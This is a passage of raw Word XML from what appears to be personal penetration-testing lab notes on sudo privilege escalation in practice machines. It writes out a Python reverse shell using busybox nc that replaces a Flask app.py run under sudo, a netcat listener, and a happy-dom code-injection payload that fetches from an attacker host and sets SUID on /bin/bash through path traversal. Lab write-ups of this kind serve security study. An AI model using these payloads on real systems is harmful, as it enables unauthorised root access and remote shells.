          <w:numId w:val="1466"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we run the command to get a shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1466"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/bin/make install -C /home/profiler/php-spx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F90">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1466"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to start a listener!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F91">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fkqjfdomoe5n" w:id="272"/>
      <w:bookmarkEnd w:id="272"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/use/bin/flask_password_changer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F93">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F94">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId678">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BitForge</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice and I'm 99% sure this is a custom file and not a standard one</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F95">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F96">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="647700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="435" name="image418.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image418.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId679"/>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1F97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After enumerating this file, we see it's a bash script so we read it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="520700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="527" name="image510.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image510.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId680"/>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1F99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So then we go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/password_change_appwhere </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the flask app should be </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="889000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="353" name="image339.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image339.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId681"/>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F9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1190"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see that we (jack) own the directory and have full permissions on the directory. So, we can replace app.py (which is run by flask) with a malicious python reverse shell which is going to be be run using sudo privileges when we run that command we have permissions to run as sudo!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv app.py app.py.old</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1190"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rename the original to something else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano app.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1190"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">import os</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1190"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">os.system("busybox nc 192.168.45.154 3306 -e bash")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lvnp 3306</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/bin/flask_password_changer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FA3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FA4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FA5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n14dqbeyblvo" w:id="273"/>
      <w:bookmarkEnd w:id="273"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/web-scraper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FA6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId682">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Wallpaperhub</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FA7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FA8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command, /usr/bin/web-scraper, is a symlink to /opt/scraper/scraper.js, a web scraping tool that imports the vulnerable happy-dom package. Research has shown that happy-dom is susceptible to arbitrary code injection (CVE-2024-51757).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FA9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1439"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To exploit this, first craft a malicious HTML payload. On the target machine, execute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FAB">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1439"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This creates an executable script that, when run, sets the SUID bit on /bin/bash. Next, craft an HTML file that will trigger this script. Create the payload file with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1439"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "chmod 4777 /bin/bash" &gt; /tmp/pwn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1439"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "4" is for SUID and "777" means everyone has all permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1439"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x /tmp/pwn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1439"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Replace 172.16.73.1 with your attacker machine’s IP address.) On your attacking machine, start a simple HTTP server to serve this file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1439"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "`&lt;script src=\"http://172.16.73.1:1337/'+require('child_process').execSync('/tmp/pwn')+'\"&gt;&lt;/script&gt;`" &gt; /tmp/pwn.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB3">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1439"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 1337</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB5">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1439"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, exploit the vulnerability by leveraging a path traversal in the web scraper. Run the following command as wp_hub to supply the malicious HTML payload to the tool:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1439"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -u root /usr/bin/web-scraper /root/web_src_downloaded/../../tmp/pwn.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1439"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output will include various links, and notably the JavaScript link that triggers the execution of our payload. After the exploit runs, verify that the SUID bit has been set on /bin/bash by checking its permissions:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FB9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1439"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FBB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FBC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1439"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
